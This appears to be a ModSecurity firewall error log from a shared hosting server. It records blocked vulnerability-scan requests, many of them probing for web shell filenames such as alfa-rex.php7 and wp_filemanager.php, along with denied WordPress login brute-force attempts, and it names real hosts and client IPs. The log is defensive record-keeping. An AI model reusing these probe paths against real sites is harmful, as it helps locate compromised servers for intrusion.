[Tue May 26 18:26:05.433595 2026] [security2:error] [pid 998632:tid 998836] [client 20.5.101.115:13305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/abcd.php"] [unique_id "ahWYZa1OTU2dW0MS1EmtGgAAACo"]
[Tue May 26 18:26:06.091808 2026] [security2:error] [pid 998632:tid 998844] [client 20.5.101.115:2968] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/al.php"] [unique_id "ahWYZq1OTU2dW0MS1EmtIgAAADI"]
[Tue May 26 18:26:06.778036 2026] [security2:error] [pid 998632:tid 998864] [client 20.5.101.115:13304] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/alfa.php"] [unique_id "ahWYZq1OTU2dW0MS1EmtMgAAAEY"]
[Tue May 26 18:26:07.482845 2026] [security2:error] [pid 998632:tid 998897] [client 20.5.101.115:2128] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/as.php"] [unique_id "ahWYZ61OTU2dW0MS1EmtPwAAAGQ"]
[Tue May 26 18:26:07.627987 2026] [security2:error] [pid 998632:tid 998850] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYZq1OTU2dW0MS1EmtJQAAADg"]
[Tue May 26 18:26:07.685699 2026] [security2:error] [pid 998632:tid 998859] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYZq1OTU2dW0MS1EmtKAAAAEE"]
[Tue May 26 18:26:08.218092 2026] [security2:error] [pid 998632:tid 998918] [client 20.5.101.115:16086] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/aa.php"] [unique_id "ahWYaK1OTU2dW0MS1EmtRAAAAHk"]
[Tue May 26 18:26:08.947296 2026] [security2:error] [pid 998632:tid 998827] [client 20.5.101.115:5314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/abc.php"] [unique_id "ahWYaK1OTU2dW0MS1EmtVAAAACM"]
[Tue May 26 18:26:09.629565 2026] [security2:error] [pid 998632:tid 998812] [client 20.5.101.115:2957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/av.php"] [unique_id "ahWYaa1OTU2dW0MS1EmtZwAAABU"]
[Tue May 26 18:26:10.308156 2026] [security2:error] [pid 998632:tid 998890] [client 20.5.101.115:2150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/autoload_classmap.php"] [unique_id "ahWYaq1OTU2dW0MS1EmtcwAAAF0"]
[Tue May 26 18:26:10.750886 2026] [security2:error] [pid 998632:tid 998872] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYaa1OTU2dW0MS1EmtXAAAAE0"]
[Tue May 26 18:26:10.965459 2026] [security2:error] [pid 998632:tid 998848] [client 20.5.101.115:2132] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/asus.php"] [unique_id "ahWYaq1OTU2dW0MS1EmtdAAAADY"]
[Tue May 26 18:26:11.673513 2026] [security2:error] [pid 998632:tid 998861] [client 20.5.101.115:5329] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/about.php"] [unique_id "ahWYa61OTU2dW0MS1EmtgwAAAEM"]
[Tue May 26 18:26:12.361117 2026] [security2:error] [pid 998632:tid 998847] [client 20.5.101.115:5356] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/atomlib.php"] [unique_id "ahWYbK1OTU2dW0MS1EmtkQAAADU"]
[Tue May 26 18:26:12.719536 2026] [security2:error] [pid 998632:tid 998911] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYa61OTU2dW0MS1EmtdwAAAHI"]
[Tue May 26 18:26:13.063038 2026] [security2:error] [pid 998632:tid 998802] [client 20.5.101.115:10674] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/alfa-rex.php7"] [unique_id "ahWYba1OTU2dW0MS1EmtnQAAAAs"]
[Tue May 26 18:26:14.360225 2026] [security2:error] [pid 998632:tid 998862] [client 20.5.101.115:13298] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/b.php"] [unique_id "ahWYbq1OTU2dW0MS1EmtrgAAAEQ"]
[Tue May 26 18:26:14.515908 2026] [security2:error] [pid 998632:tid 998680] [remote 14.161.17.36:60934] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 36.17.161.14.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-login.php"] [unique_id "ahWYbq1OTU2dW0MS1EmtrQAAURk"]
[Tue May 26 18:26:15.018025 2026] [security2:error] [pid 998632:tid 998878] [client 20.5.101.115:2945] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/buy.php"] [unique_id "ahWYb61OTU2dW0MS1EmtvwAAAFM"]
[Tue May 26 18:26:15.676491 2026] [security2:error] [pid 998632:tid 998858] [client 20.5.101.115:2175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/bless.php"] [unique_id "ahWYb61OTU2dW0MS1EmtzQAAAEA"]
[Tue May 26 18:26:15.932590 2026] [security2:error] [pid 998632:tid 998919] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYbq1OTU2dW0MS1EmtsgAAAHo"]
[Tue May 26 18:26:16.350675 2026] [security2:error] [pid 998632:tid 998829] [client 20.5.101.115:15586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/class-t.api.php"] [unique_id "ahWYcK1OTU2dW0MS1Emt2wAAACU"]
[Tue May 26 18:26:17.042546 2026] [security2:error] [pid 998632:tid 998874] [client 20.5.101.115:2953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/cache.php"] [unique_id "ahWYca1OTU2dW0MS1Emt5wAAAE8"]
[Tue May 26 18:26:17.533807 2026] [security2:error] [pid 998632:tid 998699] [remote 216.73.216.30:63313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.support.mosykay.com"] [uri "/index.php"] [unique_id "ahWYca1OTU2dW0MS1Emt9AAAXCs"]
[Tue May 26 18:26:17.759456 2026] [security2:error] [pid 998632:tid 998877] [client 20.5.101.115:5506] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/content.php"] [unique_id "ahWYca1OTU2dW0MS1Emt-wAAAFI"]
[Tue May 26 18:26:17.775676 2026] [security2:error] [pid 998632:tid 998698] [remote 216.73.216.30:63313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.support.mosykay.com"] [uri "/logo.php"] [unique_id "ahWYca1OTU2dW0MS1Emt_AAAFyo"]
[Tue May 26 18:26:18.469871 2026] [security2:error] [pid 998632:tid 998822] [client 20.5.101.115:5507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/classwithtostring.php"] [unique_id "ahWYcq1OTU2dW0MS1EmuBgAAAB4"]
[Tue May 26 18:26:19.164265 2026] [security2:error] [pid 998632:tid 998811] [client 158.62.210.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYc61OTU2dW0MS1EmuEwAAABQ"], referer: https://www.anujtradingco.com/
[Tue May 26 18:26:19.213196 2026] [security2:error] [pid 998632:tid 998886] [client 20.5.101.115:2164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/css.php"] [unique_id "ahWYc61OTU2dW0MS1EmuFwAAAFk"]
[Tue May 26 18:26:19.627004 2026] [security2:error] [pid 998632:tid 998728] [remote 67.23.237.2:44088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYc61OTU2dW0MS1EmuJQAAY0g"]
[Tue May 26 18:26:19.884521 2026] [security2:error] [pid 998632:tid 998838] [client 20.5.101.115:15566] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/chosen.php"] [unique_id "ahWYc61OTU2dW0MS1EmuLAAAACw"]
[Tue May 26 18:26:20.416146 2026] [security2:error] [pid 998632:tid 998834] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYca1OTU2dW0MS1Emt8wAAACk"]
[Tue May 26 18:26:20.550702 2026] [security2:error] [pid 998632:tid 998824] [client 20.5.101.115:2154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/doc.php"] [unique_id "ahWYdK1OTU2dW0MS1EmuMwAAACA"]
[Tue May 26 18:26:20.739097 2026] [security2:error] [pid 998632:tid 998793] [client 158.62.210.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYdK1OTU2dW0MS1EmuNgAAAAI"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1227973&moderation-hash=e95a8f6f6560d1b4919430f58edd4bf0
[Tue May 26 18:26:21.255137 2026] [security2:error] [pid 998632:tid 998873] [client 20.5.101.115:15583] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/elp.php"] [unique_id "ahWYda1OTU2dW0MS1EmuPQAAAE4"]
[Tue May 26 18:26:21.333353 2026] [security2:error] [pid 998632:tid 998713] [remote 67.23.237.2:44088] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 2.237.23.67.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYda1OTU2dW0MS1EmuPgAAZjk"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 18:26:21.915528 2026] [security2:error] [pid 998632:tid 998864] [client 20.5.101.115:5552] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/Exception-class.php"] [unique_id "ahWYda1OTU2dW0MS1EmuTgAAAEY"]
[Tue May 26 18:26:22.089587 2026] [security2:error] [pid 998632:tid 998791] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYc61OTU2dW0MS1EmuIAAAAAA"]
[Tue May 26 18:26:22.573839 2026] [security2:error] [pid 998632:tid 998843] [client 20.5.101.115:2133] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ee.php"] [unique_id "ahWYdq1OTU2dW0MS1EmuWQAAADE"]
[Tue May 26 18:26:23.252446 2026] [security2:error] [pid 998632:tid 998919] [client 20.5.101.115:2956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/edit.php"] [unique_id "ahWYd61OTU2dW0MS1EmucwAAAHo"]
[Tue May 26 18:26:23.502825 2026] [security2:error] [pid 998632:tid 998798] [client 94.26.106.167:56595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cicodev.org"] [uri "/forum-foncier-mondial-musee-d-exposition-pour-les-ong/wp-login.php"] [unique_id "ahWYd61OTU2dW0MS1EmudwAAAAc"]
[Tue May 26 18:26:23.826022 2026] [security2:error] [pid 998632:tid 998860] [client 94.26.106.167:62202] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.106.26.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cicodev.org"] [uri "/administrator/"] [unique_id "ahWYd61OTU2dW0MS1EmugQAAAEI"]
[Tue May 26 18:26:23.937026 2026] [security2:error] [pid 998632:tid 998808] [client 20.5.101.115:5371] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/f35.php"] [unique_id "ahWYd61OTU2dW0MS1EmuhQAAABE"]
[Tue May 26 18:26:23.992753 2026] [security2:error] [pid 998632:tid 998852] [client 158.62.210.87:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWYd61OTU2dW0MS1EmuhgAAADo"], referer: https://anujtradingco.com
[Tue May 26 18:26:24.595211 2026] [security2:error] [pid 998632:tid 998875] [client 20.5.101.115:2971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/fff.php"] [unique_id "ahWYeK1OTU2dW0MS1EmukAAAAFA"]
[Tue May 26 18:26:24.821329 2026] [security2:error] [pid 998632:tid 998912] [client 20.48.248.215:13972] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWYeK1OTU2dW0MS1EmulQAAAHM"]
[Tue May 26 18:26:24.821587 2026] [security2:error] [pid 998632:tid 998912] [client 20.48.248.215:13972] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWYeK1OTU2dW0MS1EmulQAAAHM"]
[Tue May 26 18:26:25.206327 2026] [security2:error] [pid 998632:tid 998847] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYdq1OTU2dW0MS1EmuYwAAADU"]
[Tue May 26 18:26:25.284527 2026] [security2:error] [pid 998632:tid 998878] [client 20.5.101.115:15587] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/ff1.php"] [unique_id "ahWYea1OTU2dW0MS1EmuoQAAAFM"]
[Tue May 26 18:26:25.942387 2026] [security2:error] [pid 998632:tid 998794] [client 20.5.101.115:15570] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/flower.php"] [unique_id "ahWYea1OTU2dW0MS1EmuqwAAAAM"]
[Tue May 26 18:26:26.503354 2026] [security2:error] [pid 998632:tid 998863] [client 20.48.248.215:43559] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/adminfuns.php"] [unique_id "ahWYeq1OTU2dW0MS1EmusAAAAEU"]
[Tue May 26 18:26:26.503476 2026] [security2:error] [pid 998632:tid 998863] [client 20.48.248.215:43559] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/adminfuns.php"] [unique_id "ahWYeq1OTU2dW0MS1EmusAAAAEU"]
[Tue May 26 18:26:26.599363 2026] [security2:error] [pid 998632:tid 998874] [client 20.5.101.115:5567] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/file.php"] [unique_id "ahWYeq1OTU2dW0MS1EmusQAAAE8"]
[Tue May 26 18:26:27.298428 2026] [security2:error] [pid 998632:tid 998886] [client 20.5.101.115:15565] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/goods.php"] [unique_id "ahWYe61OTU2dW0MS1EmuxAAAAFk"]
[Tue May 26 18:26:27.548548 2026] [security2:error] [pid 998632:tid 998893] [client 20.48.248.215:19936] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 215.248.48.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "shahvishaal.moes-art.com"] [uri "/sx_pms.php"] [unique_id "ahWYe61OTU2dW0MS1EmuxgAAAGA"]
[Tue May 26 18:26:27.548714 2026] [security2:error] [pid 998632:tid 998893] [client 20.48.248.215:19936] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "shahvishaal.moes-art.com"] [uri "/sx_pms.php"] [unique_id "ahWYe61OTU2dW0MS1EmuxgAAAGA"]
[Tue May 26 18:26:27.954601 2026] [security2:error] [pid 998632:tid 998800] [client 20.5.101.115:5519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/g.php"] [unique_id "ahWYe61OTU2dW0MS1Emu2AAAAAk"]
[Tue May 26 18:26:28.064175 2026] [security2:error] [pid 998632:tid 998917] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWYea1OTU2dW0MS1EmupwAAAHg"]
[Tue May 26 18:26:28.613711 2026] [security2:error] [pid 998632:tid 998863] [client 20.5.101.115:2980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.101.5.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "dev.cicodev.org"] [uri "/hplfuns.php"] [unique_id "ahWYfK1OTU2dW0MS1Emu6AAAAEU"]
[Tue May 26 18:26:28.771613 2026] [security2:error] [pid 998632:tid 998746] [remote 50.6.207.27:49464] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 27.207.6.50.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWYfK1OTU2dW0MS1Emu6QAAdlo"]
[Tue May 26 18:26:28.805761 2026] [security2:error] [pid 998632:tid 998906] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "rohiniventures.com"] [uri "/index.php"] [unique_id "ahWYe61OTU2dW0MS1Emu0AAAAG0"]
